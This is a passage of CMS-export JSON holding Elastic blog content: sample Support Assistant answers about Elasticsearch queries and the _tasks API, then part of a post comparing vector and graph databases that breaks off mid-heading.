search boxes where users can enter free-form text.\nHere is an example of a `query_string` query:\n```json\nGET /_search\n{\n \"query\": {\n \"query_string\": {\n \"query\": \"(new york city) OR (big apple)\",\n \"default_field\": \"content\"\n }\n }\n}\n```\n2. `terms` Query:\nThe `terms` query is used for filtering documents based on an exact match with one or more values specified in an array. It is much simpler than the `query_string` query and is used for structured searches where you know the exact values to look for. The `terms` query does not analyze the search terms, so it will look for exact matches in the inverted index. It is commonly used for filtering on keyword fields, IDs, tags, and other structured data.\nHere is an example of a `terms` query:\n```json\nGET /_search\n{\n \"query\": {\n \"terms\": {\n \"user.id\": [\"kimchy\", \"elkbee\"]\n }\n }\n}\n```\nIn summary, the `query_string` query is used for complex, full-text searches with a rich query syntax, while the `terms` query is used for simple, exact-match filtering on specific values. The choice between the two depends on the use case and the nature of the search you want to perform.\n\nReferences:\n- [Query string query](https://www.elastic.co/guide/en/elasticsearch/reference/8.14/query-dsl-query-string-query.html)\n- [Terms query](https://www.elastic.co/guide/en/elasticsearch/reference/current/query-dsl-terms-query.html) (not directly provided in the context, but relevant for the explanation)","_metadata":{"uid":"csf20ee32db7b696ce"}}},{"title_text":{"title_text":[{"title_l10n":"Step-by-step help","_metadata":{"uid":"cs73d635ec51952a36"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eQuestion: \u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003eHow can I list tasks running when high CPU is seen in the Kibana stack monitoring metrics view?\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eSupport Assistant’s answer:\u003c/strong\u003e\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs030476822bc7b7cc"}}},{"code":{"code":"To list tasks running when high CPU usage is detected in the Kibana Stack Monitoring metrics view, you would typically follow these steps:\n1. **Access Kibana**: Open Kibana in your web browser and log in if necessary.\n2. **Navigate to Stack Monitoring**: Click on the \"Stack Monitoring\" link in the main menu to access the monitoring features of your Elastic Stack.\n3. **Identify the Node with High CPU Usage**: In the Stack Monitoring section, you should be able to see an overview of your Elasticsearch cluster, including CPU usage metrics. Identify the node or nodes that are experiencing high CPU usage.\n4. **View Node Details**: Click on the node with high CPU usage to get more detailed metrics. This will take you to a page with more in-depth information about that particular node.\n5. **Access the Elasticsearch API**: To list the tasks running on the node, you will need to use the Elasticsearch `_tasks` API. You can do this directly through the Dev Tools console in Kibana or by using a tool like `curl`.\n6. **Use the `_tasks` API**: In the Dev Tools console, you can run the following command to list the tasks on the node with high CPU usage:\n ```\n GET /_tasks?nodes=\u003cnode_id\u003e\u0026detailed=true\u0026actions=*search*\n ```\n Replace `\u003cnode_id\u003e` with the actual ID of the node you're investigating. This command will list all the detailed tasks related to search actions, which are often a common cause of high CPU usage. You can adjust the `actions` parameter to filter for different types of tasks if necessary.\n7. **Analyze the Task List**: The output will show you a list of tasks currently running on the node, including their IDs, types, start times, running times, and other relevant information. This can help you identify which tasks are consuming the most CPU resources.\n8. **Take Action**: Depending on what you find, you may need to optimize your queries, scale your cluster, or take other actions to address the high CPU usage.\nPlease note that the `_tasks` API can provide a lot of information, and you might need to filter the results to find the relevant tasks. Additionally, if you have ongoing performance issues, you might want to set up more detailed monitoring or alerting to catch these issues proactively.\nThe context provided does not include specific instructions for listing tasks using the Kibana UI, but the general approach outlined above is how you would typically investigate high CPU usage in an Elasticsearch cluster using Kibana and Elasticsearch APIs.\n\nFor more detailed information on the `_tasks` API, you can refer to the Elasticsearch documentation:\nhttps://www.elastic.co/guide/en/elasticsearch/reference/current/tasks.html","_metadata":{"uid":"cs387f71b62e322403"}}},{"title_text":{"title_text":[{"title_l10n":"Building your own Elastic-powered Support Assistant ","_metadata":{"uid":"cs4add5f4eaa8f1568"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eInternal to Elastic, the Field Technology team builds tools for Elastic employees. We use our own technologies heavily and are often customer zero for our Search and Observability solutions. The image below shows our architecture at the time of this release.\u0026nbsp;\u0026nbsp;\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs25c0d1e5c3864e95"}}},{"image":{"image":{"uid":"blt579f79c30b074b29","_version":1,"title":"support assistant blog.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-09-04T15:00:41.707Z","updated_at":"2024-09-04T15:00:41.707Z","content_type":"image/png","file_size":"149910","filename":"support_assistant_blog.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-09-04T15:01:52.288Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt579f79c30b074b29/66d876198f798d5c42dfaa84/support_assistant_blog.png"},"_metadata":{"uid":"cscda09e2d1879c0c5"},"caption_l10n":"","alt_text_l10n":"user flowchart","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csd650344110f247c9"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWith so many architecture and software options available, finding the right approach can be difficult. If you're interested in building a chatbot, our related blog, \u003c/span\u003e\u003ca href=\"https://www.elastic.co/search-labs/tutorials/chatbot-tutorial/welcome\"\u003e\u003cspan style='font-size: 12pt;'\u003echatbot-tutorial\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e, provides a step-by-step guide to help you get started. As documented in this blog series, we found that a RAG architecture powered by Elasticsearch delivered the best results for our users and provided a platform for future generative AI solutions.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eTo fully harness the power of search and drive GenAI innovation across your enterprise, we highly recommend partnering with \u003c/span\u003e\u003ca href=\"https://www.elastic.co/consulting/contact\"\u003e\u003cspan style='font-size: 12pt;'\u003eElastic Consulting\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e. Whether you're developing highly personalized ecommerce experiences or implementing interactive chatbots, our consultants have the technical expertise to design and deploy GenAI solutions tailored to your unique business needs.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Experience the Elastic-powered Support Assistant ","_metadata":{"uid":"cs5fad09769d0a5893"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe Support Assistant is the latest enhancement to the \u003c/span\u003e\u003ca href=\"https://support.elastic.co/home\"\u003e\u003cspan style='font-size: 12pt;'\u003eElastic Support Hub\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e, reflecting our ongoing commitment to empowering our customers through self-service knowledge discovery and agent-driven support cases. Accuracy has always been a priority for us, beginning nearly a year ago with our transition to \u003c/span\u003e\u003ca href=\"https://www.elastic.co/search-labs/blog/elastic-support-hub-moves-to-semantic-search\"\u003e\u003cspan style='font-size: 12pt;'\u003esemantic search\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e, and the addition of the Support Assistant is no exception. We will continue to monitor and improve response accuracy over time.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eGive the Support Assistant a try and let us know your thoughts — your feedback will shape its future improvements.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csad56d7a3a2c8cf1d"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs5e518b53e6eda27d"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eThe release and timing of any features or functionality described in this post remain at Elastic's sole discretion. Any features or functionality not currently available may not be delivered on time or at all.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eIn this blog post, we may have used or referred to third party generative AI tools, which are owned and operated by their respective owners. Elastic does not have any control over the third party tools and we have no responsibility or liability for their content, operation or use, nor for any loss or damage that may arise from your use of such tools. Please exercise caution when using AI tools with personal, sensitive or confidential information. Any data you submit may be used for AI training or other purposes. There is no guarantee that information you provide will be kept secure or confidential. You should familiarize yourself with the privacy practices and terms of use of any generative AI tools prior to use.\u0026nbsp;\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eElastic, Elasticsearch, ESRE, Elasticsearch Relevance Engine and associated marks are trademarks, logos or registered trademarks of Elasticsearch N.V. in the United States and other countries. All other company and product names are trademarks, logos or registered trademarks of their respective owners.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs6c6510ae3eac0943"}}}],"publish_date":"2024-09-04","sanity_migration_complete":false,"seo":{"seo_title_l10n":"","seo_description_l10n":"","seo_image":null,"noindex":false,"canonical_tag":""},"subtitle_l10n":"","table_of_contents":{"blog_series":[]},"tags":[],"tags_culture":[],"tags_elastic_stack":[],"tags_industry":[],"tags_partner":[],"tags_topic":[{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt99b075caf3df4ca7","ACL":{},"created_at":"2023-11-06T21:41:39.171Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"generative-ai","label_l10n":"Generative AI","tags":[],"title":"Generative AI","updated_at":"2023-11-06T21:41:39.171Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:18.390Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"bltbaad5df00a89fcb2","ACL":{},"created_at":"2023-11-06T20:07:17.254Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"ai-search-applications","label_l10n":"AI search applications","tags":[],"title":"AI search applications","updated_at":"2023-11-06T20:07:17.254Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:41:43.822Z","user":"blt06083bb707628f5c"}}],"tags_use_case":[{"_version":3,"locale":"en-us","uid":"blt10eb11313dc454f1","ACL":{},"created_at":"2020-06-17T03:30:26.497Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"enterprise-search","label_l10n":"Search","tags":[],"title":"Search","updated_at":"2023-07-19T16:04:51.718Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.232Z","user":"blt4b2e1169881270a8"}}],"thumbnail_image":{"uid":"blt6b8e22aaf03191f2","_version":1,"title":"144760---2nd-Batch-of-10-GAI-blog-header-images_07 (1).jpg","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-09-04T14:45:59.331Z","updated_at":"2024-09-04T14:45:59.331Z","content_type":"image/jpeg","file_size":"33885","filename":"144760---2nd-Batch-of-10-GAI-blog-header-images_07_(1).jpg","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-09-04T15:01:52.303Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt6b8e22aaf03191f2/66d872a7661b34e612b3696a/144760---2nd-Batch-of-10-GAI-blog-header-images_07_(1).jpg"},"title":"GenAI for customer support: Explore the Elastic Support Assistant","title_l10n":"GenAI for customer support: Explore the Elastic Support Assistant","updated_at":"2025-01-17T22:03:30.256Z","updated_by":"blt3044324473ef223b70bc674c","url":"/blog/generative-ai-customer-support-elastic-support-assistant","publish_details":{"time":"2025-01-17T22:03:36.172Z","user":"blt3044324473ef223b70bc674c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blta39f52d65b4364a8","_version":6,"locale":"en-us","ACL":{},"abstract_l10n":"Discover the differences and similarities between knowledge graph and vector databases in this comprehensive guide. Explore their definitions and ideal use cases, and make an informed decision on which one to choose.","author":["blt6705dad0ae6f1419"],"category":["bltc17514bfdbc519df"],"created_at":"2024-04-11T14:11:29.188Z","created_by":"bltb6c155cd84fc0c1a","markdown_l10n":"","modular_blocks":[{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs658553cdfd346e5c"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eBig data management isn’t just about storing as much data as possible. It’s about being able to identify meaningful insights, discover hidden patterns, and make informed decisions. This quest for advanced analytics has been the driving force behind innovations in data modeling and storage solutions, way beyond traditional relational databases.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eTwo of these innovations are vector databases and graph databases. Both are significant advancements in managing data, providing unique data structures with their own distinct strengths. But you need to have an understanding of how they work and how they are different before you can effectively choose which one is best for your project or goals.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThis blog post will be your guide — outlining how they work, how they’re similar, and how they’re also \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cem\u003every\u003c/em\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e different. We’ll explore the contrasting data structures, explore their ideal use cases, and help you to choose between the two of them. To make this easier, we’ve broken it down into a few sections:\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eVector database definition and concepts\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWhat are graph databases?\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eComparing vector and graph databases\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eVector and graph databases use cases\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eChoosing between vector and graph databases\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eBy the end of this article, you’ll have all the information you need to make an informed decision, so you can get the most out of your data.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Vector database definition and concepts","_metadata":{"uid":"csfa9018af1b491012"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eInstead of rows and columns, a vector database organizes data as points in a vast, multi-dimensional space. Each point represents a piece of data, and the location reflects its characteristics relative to other pieces of data. Think of it like a universe where every planet is a piece of data, and they’re organized to be closer to similar planets and further away from planets with fewer similarities.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eIt achieves this by storing the data as high-dimensional vectors, which are numerical representations of the data features. These vectors capture the essence of the data they represent, which is how they can be encoded and organized within the multi-dimensional space. And the closer two points are in the multi-dimensional space, the more similar their underlying data is.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eThis is why vector databases excel at similarity search. Because the vectors are structured based on similarity, you can quickly identify data points that are closest to your query vector. This makes them ideal for a number of important applications:\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eImage and document retrieval:\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e Find similar images based on content, not just keywords.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003ePersonalized recommendations:\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e Recommend products or content similar to what a user has interacted with before.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eAnomaly detection:\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e Identify unusual data points that deviate from the norm, potentially indicating fraud or system errors.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eMachine learning:\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e Efficiently process and analyze high-dimensional data for tasks like text analysis, image classification, and natural language processing.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cem\u003e\u003cstrong\u003eWant a more detailed guide? Read \u003c/strong\u003e\u003c/em\u003e\u003c/span\u003e\u003ca href=\"https://www.elastic.co/what-is/vector-database\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cem\u003e\u003cstrong\u003eWhat is a vector database?\u003c/strong\u003e\u003c/em\u003e\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cem\u003e\u003cstrong\u003e for a full walk-through.\u003c/strong\u003e\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"What are graph databases?","_metadata":{"uid":"cs506e9fcc65feaef0"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eAlthough they may look similar at a glance, graph databases organize data in an entirely different way. Instead of using rigid tables like a relational database, or organizing the data by similarity like vector databases, they store data in a graph structure. Entities are represented by nodes on the graph, and relationships are represented by edges. Think of it like a mindmap, where each node is a circle representing people, places, or things, and the lines between them (edges) show how they’re connected.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csd79528df74cb9edf"}}},{"image":{"image":{"uid":"bltf3f405db5ec62c16","_version":1,"created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-04-11T14:14:12.471Z","updated_at":"2024-04-11T14:14:12.471Z","content_type":"image/png","file_size":"292238","filename":"diagram.png","title":"diagram.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-04-11T14:23:42.888Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltf3f405db5ec62c16/6617f034d742b60520d9d90d/diagram.png"},"_metadata":{"uid":"cs1b66e58fae43c122"},"caption_l10n":"","alt_text_l10n":"1 - Diagram representing graph databases as circles (nodes) spread out, connected by lines (edges) to represent the different relationships","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs514a2270817bffaa"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eOne of the advantages of this kind of structure is that it’s a more natural representation of complex relationships. This makes it easier to interpret the connections compared to other types of databases. The schema-less structure of graph databases also means you can easily add new nodes and edges as your data grows, making it both flexible and scalable. This makes graph databases ideal for many applications:\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eReal-time analytics:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e Analyze streaming data, predict future outcomes, and optimize dynamic systems in real time with graph databases.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eMaster data management:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e Create a unified view of entities, resolve ambiguity, and track entity evolution within a single interconnected graph.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eNetwork discovery:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e Uncover hidden connections, identify anomalies, and predict cascading failures by analyzing relationships within networks.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eKnowledge graph construction:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e Build intelligent knowledge bases, answer complex questions, and power intelligent applications through interconnected entities and concepts.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e"},{"title_l10n":"Comparing vector and graph databases","_metadata":{"uid":"csfa24a899e4472456"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eYou should now understand what each type of database is and how it structures data. But it’s also crucial to understand the nuanced differences between vector and graph databases. The easiest way to do this is with a side-by-side comparison:\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"","_metadata":{"uid":"cs76c8d8326e300cd6"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003c/p\u003e\u003ctable\u003e\u003ctbody\u003e\u003ctr\u003e\u003ctd\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003e\u003c/strong\u003e\u003c/span\u003e\u003c/td\u003e\u003ctd\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eVector database\u003c/strong\u003e\u003c/span\u003e\u003c/td\u003e\u003ctd\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eGraph database\u003c/strong\u003e\u003c/span\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eData representation\u003c/strong\u003e\u003c/span\u003e\u003c/td\u003e\u003ctd\u003e\u003cspan style='font-size: 12pt;'\u003eData is structured as points in a vast, multi-dimensional space. Points closer together represent similar content. Ideal for capturing inherent similarities within data itself, regardless of connections or relationships.\u003c/span\u003e\u003c/td\u003e\u003ctd\u003e\u003cspan style='font-size: 12pt;'\u003eData is structured as a web of interconnected nodes (entities) linked by edges (relationships). Focuses on representing the connections and hierarchies between data points, offering valuable insights into how entities relate to each other.\u003c/span\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eQuerying and retrieval\u003c/strong\u003e\u003c/span\u003e\u003c/td\u003e\u003ctd\u003e\u003cspan style='font-size: 12pt;'\u003eExcel at similarity search, efficiently finding data points similar to a query vector. Ideal for tasks like image/document retrieval, where understanding content similarity is crucial.\u003c/span\u003e\u003c/td\u003e\u003ctd\u003e\u003cspan style='font-size: 12pt;'\u003ePowerful for navigating relationships and connections. Enable efficient traversal of network structures, perfect for social network analysis, recommendation systems, and exploring knowledge graphs.\u003c/span\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003ePerformance and scalability\u003c/strong\u003e\u003c/span\u003e\u003c/td\u003e\u003ctd\u003e\u003cspan style='font-size: 12pt;'\u003eGenerally scales well with large data sets due to optimized similarity search algorithms. However, schema changes might require data re-embeddings, impacting performance.\u003c/span\u003e\u003c/td\u003e\u003ctd\u003e\u003cspan style='font-size: 12pt;'\u003eHighly flexible due to schema-less nature, allowing for easy data addition and modification. However, complex queries or large networks can strain performance, requiring careful optimization.\u003c/span\u003e\u003c/td\u003e\u003c/tr\u003e\u003c/tbody\u003e\u003c/table\u003e\u003cp\u003e\u003c/p\u003e"},{"title_l10n":"Use cases","_metadata":{"uid":"cs26fb08b862fe68d9"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eTo better understand the differences between vector and graph databases, let’s compare how each one can be used within the same sector. This not only shows the contrasts but also how they could potentially be used together to achieve great results:\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Fraud detection","_metadata":{"uid":"cs6696cb58098e8022"},"header_style":"H3","paragraph_l10n":"\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eVector databases:\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e Identify fraudulent transactions by analyzing transaction patterns and user information. Detect anomalies in spending habits, purchase locations, or device fingerprints based on learned similarity profiles.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eGraph databases:\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e Uncover suspicious networks of connected individuals or transactions. Identify fraudulent activity by analyzing relationships between entities involved in potential fraud attempts.\u003c/span\u003e\u003c/li\u003e\u003c/ul\u003e"},{"title_l10n":"Scientific research","_metadata":{"uid":"cs70df960096a75860"},"header_style":"H3","paragraph_l10n":"\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eVector databases:\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e Analyze complex data structures like protein sequences, gene expressions, or chemical compounds. Compare diverse data sets and identify similarities based on multi-dimensional features, leading to new scientific discoveries.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eGraph databases:\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e Model biological pathways or molecular interactions. Explore intricate relationships between entities and visualize complex systems, leading to a deeper understanding of biological processes.\u003c/span\u003e\u003c/li\u003e\u003c/ul\u003e"},{"title_l10n":"Ecommerce","_metadata":{"uid":"csb1a992aa81050bb4"},"header_style":"H3","paragraph_l10n":"\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eVector databases:\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e Analyze product attributes like images, text descriptions, and technical specifications. Recommend similar products based on content similarity, leading to more relevant and engaging suggestions.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eGraph databases:\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e Capture user-product interactions like purchases, browsing history, and wish lists. Recommend products based on users' similarities to others with similar taste, creating a more personalized shopping experience.\u003c/span\u003e\u003c/li\u003e\u003c/ul\u003e"},{"title_l10n":"Media and entertainment","_metadata":{"uid":"cscefde7decc457d1b"},"header_style":"H3","paragraph_l10n":"\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eVector databases:\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e Analyze content features like music genres, article topics, or movie themes. Recommend similar songs, movies, or articles based on inherent content similarity, catering to individual preferences.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eGraph databases:\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e Explore user-content relationships like watch history, reading lists, or social media shares. Recommend content based on connections between users with similar interests, fostering engagement and discovery.\u003c/span\u003e\u003c/li\u003e\u003c/ul\u003e"},{"title_l10n":"Choosing between vector and graph databases","_metadata":{"uid":"cs1f8f7c4f76e57194"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eEven with the information we’ve been through in this article, selecting the right database can still be a daunting task. To make this process simpler, here’s a framework you can follow to help you make the best decision to achieve your goal.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Step 1. Understand your data","_metadata":{"uid":"cs0681227aedf43615"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe first part of this process is to look at the complexity of your data. Is it primarily structured or unstructured? Does it involve intricate relationships or independent entities?\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eYou also need to consider your data volume and how quickly you expect it to grow. Then you need to decide what specific features or attributes define your data points — and whether these are numerical or categorical.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Step 2. Identify your primary use cases","_metadata":{"uid":"csb818db3fd8294b32"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eIn simple terms, what insights are you hoping to glean from your data analysis? Are you trying to find similar data points based on content or explore intricate connections between entities? What kind of queries will you be performing frequently?\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Step 3. Performance and scalability needs","_metadata":{"uid":"cs1e889665df3f52ab"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe third step is to think about how important speed and scalability are to your goal. How critical are real-time responses for your application? How large are your data sets, and how complex are your anticipated queries? You also need to consider your budget constraints and resource limitations.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Step 4. Evaluate the specific advantages of each 